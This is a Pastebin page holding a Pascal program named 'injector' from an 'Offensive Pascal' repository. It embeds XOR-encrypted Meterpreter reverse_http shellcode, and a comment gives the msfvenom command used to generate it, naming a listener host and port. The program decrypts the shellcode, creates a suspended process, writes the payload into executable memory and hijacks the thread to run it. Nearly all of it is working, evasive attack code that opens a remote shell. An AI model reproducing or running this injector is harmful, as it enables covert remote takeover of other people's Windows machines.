Advertisement
FlyFar

injector.lpr

Jul 15th, 2023
1,769
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pascal 5.54 KB | Cybersecurity | 0 0
  1. {
  2.   this one is part of repo published on github under the name of Offensive Pascal
  3.   Pascal is a great and still up to date :)
  4.   these projects can be compilied using FreePascal (FPC)
  5.   or Delphi
  6.   author : @zux0x3a
  7.   site :   0xsp.com / ired.dev
  8.   https://github.com/0xsp-SRD/OffensivePascal
  9.  
  10.  }
  11.  
  12.  
  13. program injector;
  14.  
  15. {$mode delphi}
  16.  
  17.  
  18. uses
  19.  
  20.   windows,Classes,strutils,sysutils;
  21.  
  22.  type
  23.   TByteArray = array of byte;
  24.  
  25.  
  26.  
  27. function Crypt(const aText: byte): tbyte;
  28. const
  29.   PWD = 'a';   // key used for XOR
  30.  
  31. begin
  32.     result := byte(Ord(aText) xor  Ord(PWD));
  33. end;
  34.  
  35.  
  36.  
  37.  
  38. procedure inject_shell;
  39. const
  40.  //   msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.0.108 LPORT=443 --encrypt xor --encrypt-key "a" -f c | sed -r 's/[\x]+/$/g' | sed -r 's/[\]+/,/g' | sed -r 's/["]+//g' | sed -e 's/$/\,/' | cut -c 2-
  41.  
  42.   shellcode:array[0..653] of BYTE = (
  43. $9d,$29,$e2,$85,$91,$89,$ad,$61,$61,$61,$20,$30,$20,$31,$33,
  44. $29,$50,$b3,$30,$37,$04,$29,$ea,$33,$01,$29,$ea,$33,$79,$29,
  45. $ea,$33,$41,$2c,$50,$a8,$29,$ea,$13,$31,$29,$6e,$d6,$2b,$2b,
  46. $29,$50,$a1,$cd,$5d,$00,$1d,$63,$4d,$41,$20,$a0,$a8,$6c,$20,
  47. $60,$a0,$83,$8c,$33,$29,$ea,$33,$41,$ea,$23,$5d,$20,$30,$29,
  48. $60,$b1,$07,$e0,$19,$79,$6a,$63,$6e,$e4,$13,$61,$61,$61,$ea,
  49. $e1,$e9,$61,$61,$61,$29,$e4,$a1,$15,$06,$29,$60,$b1,$ea,$29,
  50. $79,$31,$25,$ea,$21,$41,$28,$60,$b1,$82,$37,$2c,$50,$a8,$29,
  51. $9e,$a8,$20,$ea,$55,$e9,$29,$60,$b7,$29,$50,$a1,$20,$a0,$a8,
  52. $6c,$cd,$20,$60,$a0,$59,$81,$14,$90,$2d,$62,$2d,$45,$69,$24,
  53. $58,$b0,$14,$b9,$39,$25,$ea,$21,$45,$28,$60,$b1,$07,$20,$ea,
  54. $6d,$29,$25,$ea,$21,$7d,$28,$60,$b1,$20,$ea,$65,$e9,$29,$60,
  55. $b1,$20,$39,$20,$39,$3f,$38,$3b,$20,$39,$20,$38,$20,$3b,$29,
  56. $e2,$8d,$41,$20,$33,$9e,$81,$39,$20,$38,$3b,$29,$ea,$73,$88,
  57. $2a,$9e,$9e,$9e,$3c,$29,$50,$ba,$32,$28,$df,$16,$08,$0f,$08,
  58. $0f,$04,$15,$61,$20,$37,$29,$e8,$80,$28,$a6,$a3,$2d,$16,$47,
  59. $66,$9e,$b4,$32,$32,$29,$e8,$80,$32,$3b,$2c,$50,$a1,$2c,$50,
  60. $a8,$32,$32,$28,$db,$5b,$37,$18,$c6,$61,$61,$61,$61,$9e,$b4,
  61. $89,$6f,$61,$61,$61,$50,$58,$53,$4f,$50,$57,$59,$4f,$51,$4f,
  62. $50,$51,$59,$61,$3b,$29,$e8,$a0,$28,$a6,$a1,$da,$60,$61,$61,
  63. $2c,$50,$a8,$32,$32,$0b,$62,$32,$28,$db,$36,$e8,$fe,$a7,$61,
  64. $61,$61,$61,$9e,$b4,$89,$e7,$61,$61,$61,$4e,$38,$29,$2e,$58,
  65. $31,$0e,$4c,$4c,$26,$14,$18,$03,$31,$11,$0e,$59,$4c,$39,$56,
  66. $05,$25,$30,$50,$08,$13,$37,$56,$0a,$03,$15,$3e,$0e,$58,$0c,
  67. $20,$33,$37,$2a,$2b,$00,$26,$3b,$28,$0a,$29,$0a,$06,$2c,$13,
  68. $29,$24,$37,$16,$1b,$2b,$4c,$05,$26,$30,$02,$22,$20,$54,$2f,
  69. $0b,$16,$59,$33,$29,$50,$31,$02,$0a,$0f,$0e,$30,$2c,$2d,$08,
  70. $14,$2e,$20,$57,$07,$07,$03,$0a,$23,$0a,$10,$35,$2e,$55,$05,
  71. $0c,$26,$00,$35,$2b,$2a,$59,$2a,$3e,$28,$18,$04,$2a,$09,$52,
  72. $0b,$27,$0b,$38,$57,$39,$2e,$1b,$52,$34,$07,$17,$0c,$55,$3e,
  73. $2e,$13,$2c,$0d,$3b,$35,$39,$00,$61,$29,$e8,$a0,$32,$3b,$20,
  74. $39,$2c,$50,$a8,$32,$29,$d9,$61,$63,$49,$e5,$61,$61,$61,$61,
  75. $31,$32,$32,$28,$a6,$a3,$8a,$34,$4f,$5a,$9e,$b4,$29,$e8,$a7,
  76. $0b,$6b,$3e,$32,$3b,$29,$e8,$90,$2c,$50,$a8,$2c,$50,$a8,$32,
  77. $32,$28,$a6,$a3,$4c,$67,$79,$1a,$9e,$b4,$e4,$a1,$14,$7e,$29,
  78. $a6,$a0,$e9,$72,$61,$61,$28,$db,$25,$91,$54,$81,$61,$61,$61,
  79. $61,$9e,$b4,$29,$9e,$ae,$15,$63,$8a,$ad,$89,$34,$61,$61,$61,
  80. $32,$38,$0b,$21,$3b,$28,$e8,$b0,$a0,$83,$71,$28,$a6,$a1,$61,
  81. $71,$61,$61,$28,$db,$39,$c5,$32,$84,$61,$61,$61,$61,$9e,$b4,
  82. $29,$f2,$32,$32,$29,$e8,$86,$29,$e8,$90,$29,$e8,$bb,$28,$a6,
  83. $a1,$61,$41,$61,$61,$28,$e8,$98,$28,$db,$73,$f7,$e8,$83,$61,
  84. $61,$61,$61,$9e,$b4,$29,$e2,$a5,$41,$e4,$a1,$15,$d3,$07,$ea,
  85. $66,$29,$60,$a2,$e4,$a1,$14,$b3,$39,$a2,$39,$0b,$61,$38,$28,
  86. $a6,$a3,$91,$d4,$c3,$37,$9e,$b4,$00);
  87.  
  88. var
  89.   pi: TProcessInformation;
  90.   si: TStartupInfo;
  91.   {$ifdef win32}
  92.   ctx: Context;
  93.   {$endif}
  94.  
  95.   {$ifdef win64}
  96.   ctx : Pcontext;
  97.   {$endif}
  98.   remote_shellcodePtr: Pointer;
  99.   {$ifdef win64}
  100.   Written:dword64;
  101.   {$endif}
  102.    {$ifdef win32}
  103.   Written:dword;
  104.   {$endif}
  105.   AppToLaunch: string;
  106.   i ,s_size: Cardinal;
  107.   tmp :  array of byte;
  108.   len: integer;
  109.  
  110.  
  111. begin
  112.  
  113. // get length of shellcode
  114. len := length(shellcode);
  115. writeln('size of shellcode ', len);
  116.  
  117. // set array of byte length to match size of shellcode
  118. setlength(tmp,len);
  119.  
  120. writeln('[+] Decrypting shellcode');
  121.       for i := 0 to len -1 do begin
  122.           tmp[i] := crypt(shellcode[i]);  // process of decryption
  123.        end;
  124.  
  125. AppToLaunch := 'notepad.exe';
  126. UniqueString(AppToLaunch);
  127.  
  128. FillMemory( @si, sizeof( si ), 0 );
  129. FillMemory( @pi, sizeof( pi ), 0 );
  130.  
  131. writeln('[+] Creating Process in Suspended Mode');
  132.  
  133. CreateProcess('c:\windows\system32\cmd.exe', PChar(AppToLaunch), nil, nil, False,
  134.               CREATE_SUSPENDED,
  135.               nil, nil,  si, pi );
  136.  
  137.  
  138.  
  139.  {$ifdef win32}
  140.  ctx.ContextFlags := CONTEXT_CONTROL;
  141.  GetThreadContext(pi.hThread,ctx);
  142.  {$endif}
  143.  
  144.  {$ifdef win64}
  145.   ctx := PCONTEXT(VirtualAlloc(nil, sizeof(ctx), MEM_COMMIT, PAGE_READWRITE));
  146.   ctx.ContextFlags := CONTEXT_ALL;
  147.   GetThreadContext(pi.hThread,ctx^);
  148.  {$endif}
  149.  
  150.  
  151.  //allocate the memory size
  152.  remote_shellcodePtr:=VirtualAllocEx(pi.hProcess,Nil,s_size,MEM_COMMIT,
  153.    PAGE_EXECUTE_READWRITE);
  154.  
  155.  
  156.  
  157.  
  158.  // decryption section start here
  159.  
  160.  
  161.  
  162.  // write array of bytes into process memory
  163.  WriteProcessMemory(pi.hProcess,remote_shellcodePtr,Tbytearray(tmp),s_size,written);
  164.  
  165.  
  166. {$ifdef win64}
  167.  ctx.rip:=dword64(remote_shellcodePtr);
  168.  //ctx.ContextFlags := CONTEXT_CONTROL;
  169.  SetThreadContext(pi.hThread,ctx^);
  170.  ResumeThread(pi.hThread);
  171. {$ENDIF}
  172.  
  173. {$ifdef win32}
  174.  ctx.Eip:=integer(remote_shellcodePtr);
  175.  ctx.ContextFlags := CONTEXT_CONTROL;
  176.  SetThreadContext(pi.hThread,ctx);
  177.  
  178.  ResumeThread(pi.hThread);
  179. {$endif}
  180.  
  181.  
  182.  end;
  183.  
  184.  
  185.  
  186. begin
  187.   inject_shell;
  188.  
  189. end.
  190.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement